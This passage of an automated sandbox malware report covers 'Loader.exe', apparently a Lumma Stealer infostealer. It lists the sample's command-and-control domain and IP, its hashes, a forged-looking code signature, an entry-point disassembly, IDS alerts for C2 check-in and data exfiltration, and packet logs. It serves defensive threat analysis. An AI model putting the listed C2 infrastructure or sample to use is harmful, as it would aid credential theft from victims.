                                                                              https://cureprouderio.click/;0Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cureprouderio.click/cLoader.exe, 00000003.00000003.2074388190.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cureprouderio.clicLoader.exe, 00000003.00000003.2234239277.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgLoader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cureprouderio.click/apiwnLoader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refLoader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cureprouderio.click:443/apiLoader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Loader.exe, 00000003.00000002.2235463947.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2170956786.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189552535.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177005335.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cureprouderio.click/8D7Qw/WoBLoader.exe, 00000003.00000003.2145695820.0000000005365000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145765606.0000000005365000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.entrust.net/2048ca.crl0Loader.exefalse
                                                                                            high
                                                                                            https://www.entrust.net/rpa0Loader.exefalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              172.67.132.7
                                                                                              cureprouderio.clickUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1581552
                                                                                              Start date and time:2024-12-28 04:13:08 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 4m 42s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:6
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:Loader.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/1@1/1
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 93%
                                                                                              • Number of executed functions: 52
                                                                                              • Number of non-executed functions: 166
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              22:13:58API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              172.67.132.7https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#Get hashmaliciousUnknownBrowse
                                                                                                No context
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSSolara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                Script.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                48.252.190.9.zipGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.95.219
                                                                                                https://haleborealis.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.22.72.81
                                                                                                External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.29.252
                                                                                                Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                • 104.26.13.205
                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.216.74
                                                                                                New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.92.91
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                a0e9f5d64349fb13191bc781f81f42e1Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Script.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.132.7
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                                                File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):14402
                                                                                                Entropy (8bit):4.874636730022465
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.568800602855412
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Loader.exe
                                                                                                File size:572'456 bytes
                                                                                                MD5:89c77bce077f8e9da11c4d6a6c496db1
                                                                                                SHA1:43c62a61c90fb05dfdd19c871d9406b61e10d948
                                                                                                SHA256:2f030fcc8d51309c46b8913109dbb5b6821d5b69da971962370d8470db1ad830
                                                                                                SHA512:eb9a891dd4c500d439c00e01bf8700a311276e87cc89f69ae4e75b860c105ccbfc8d13e2ea61f1b10df985d608cbb95c0e7ecf623e7c1472c43edbfacb2cf21c
                                                                                                SSDEEP:12288:fYO6Dqzihouxpa+yWFDLcV5snOOowFpo6igS1wEO:AO6DThou2+yZaL1i11wt
                                                                                                TLSH:F4C4E1023690C4B3D5631A369979D7794A3EB8100F6256DBA3944FFECEB02C15F31A6E
                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.................................Ez....@.................................|j..<..
                                                                                                Icon Hash:00928e8e8686b000
                                                                                                Entrypoint:0x4104a0
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows cui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:96d90e8808da099bc17e050394f447e7
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                Subject Chain
                                                                                                • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                Version:3
                                                                                                Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                Instruction
                                                                                                call 00007EFF5CDCB12Ah
                                                                                                jmp 00007EFF5CDCAF8Dh
                                                                                                mov ecx, dword ptr [0043B680h]
                                                                                                push esi
                                                                                                push edi
                                                                                                mov edi, BB40E64Eh
                                                                                                mov esi, FFFF0000h
                                                                                                cmp ecx, edi
                                                                                                je 00007EFF5CDCB126h
                                                                                                test esi, ecx
                                                                                                jne 00007EFF5CDCB148h
                                                                                                call 00007EFF5CDCB151h
                                                                                                mov ecx, eax
                                                                                                cmp ecx, edi
                                                                                                jne 00007EFF5CDCB129h
                                                                                                mov ecx, BB40E64Fh
                                                                                                jmp 00007EFF5CDCB130h
                                                                                                test esi, ecx
                                                                                                jne 00007EFF5CDCB12Ch
                                                                                                or eax, 00004711h
                                                                                                shl eax, 10h
                                                                                                or ecx, eax
                                                                                                mov dword ptr [0043B680h], ecx
                                                                                                not ecx
                                                                                                pop edi
                                                                                                mov dword ptr [0043B6C0h], ecx
                                                                                                pop esi
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 14h
                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                xorps xmm0, xmm0
                                                                                                push eax
                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                call dword ptr [00436D00h]
                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                call dword ptr [00436CB8h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                call dword ptr [00436CB4h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                push eax
                                                                                                call dword ptr [00436D50h]
                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                xor eax, ecx
                                                                                                leave
                                                                                                ret
                                                                                                mov eax, 00004000h
                                                                                                ret
                                                                                                push 0043CF48h
                                                                                                call dword ptr [00436D28h]
                                                                                                ret
                                                                                                push 00030000h
                                                                                                push 00010000h
                                                                                                push 00000000h
                                                                                                call 00007EFF5CDD1F03h
                                                                                                add esp, 0Ch
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x3fc.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x896000x2628.bss
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .bss0x420000x4be000x4be002905805b4387a210b235477c32a7d7a2False1.0003249845551894data7.9993225818261315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x8e0000x3fc0x4004243bfa36d7c6187562be2edfa0b46c2False0.443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_VERSION0x8e0580x3a4dataEnglishUnited States0.44849785407725323
                                                                                                DLLImport
                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                USER32.dllShowWindow
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-12-28T04:13:59.265947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.132.7443TCP
                                                                                                2024-12-28T04:14:00.028753+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549708172.67.132.7443TCP
                                                                                                2024-12-28T04:14:00.028753+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708172.67.132.7443TCP
                                                                                                2024-12-28T04:14:01.301951+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.132.7443TCP
                                                                                                2024-12-28T04:14:02.110528+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549709172.67.132.7443TCP
                                                                                                2024-12-28T04:14:02.110528+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549709172.67.132.7443TCP
                                                                                                2024-12-28T04:14:03.769915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.132.7443TCP
                                                                                                2024-12-28T04:14:04.647437+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710172.67.132.7443TCP
                                                                                                2024-12-28T04:14:06.072098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711172.67.132.7443TCP
                                                                                                2024-12-28T04:14:08.439165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.132.7443TCP
                                                                                                2024-12-28T04:14:11.204433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.132.7443TCP
                                                                                                2024-12-28T04:14:13.829357+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714172.67.132.7443TCP
                                                                                                2024-12-28T04:14:13.833616+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549714172.67.132.7443TCP
                                                                                                2024-12-28T04:14:17.467661+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718172.67.132.7443TCP
                                                                                                2024-12-28T04:14:18.223149+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549718172.67.132.7443TCP
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 28, 2024 04:13:57.970557928 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:57.970675945 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:13:57.970834017 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:57.972125053 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:57.972168922 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:13:59.265860081 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:13:59.265947104 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:59.271572113 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:59.271615028 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:13:59.271821976 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:13:59.324774981 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:59.324860096 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:13:59.324939013 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.028759956 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.028848886 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.028944016 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.032772064 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.032804966 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.032820940 CET49708443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.032826900 CET44349708172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.042105913 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.042160988 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:00.042258978 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.042558908 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:00.042576075 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:01.301860094 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:01.301950932 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:01.321100950 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:01.321129084 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:01.321357965 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:01.323096037 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:01.323160887 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:01.323174953 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110479116 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110529900 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110554934 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110583067 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110590935 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.110613108 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.110627890 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.118793011 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.118860006 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.118869066 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.127182007 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.127228975 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.127235889 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.168709040 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.168716908 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.215574980 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.230133057 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.278076887 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.278096914 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315207958 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315248013 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.315254927 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315264940 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315320969 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.315329075 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315354109 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315402031 CET49709443192.168.2.5172.67.132.7
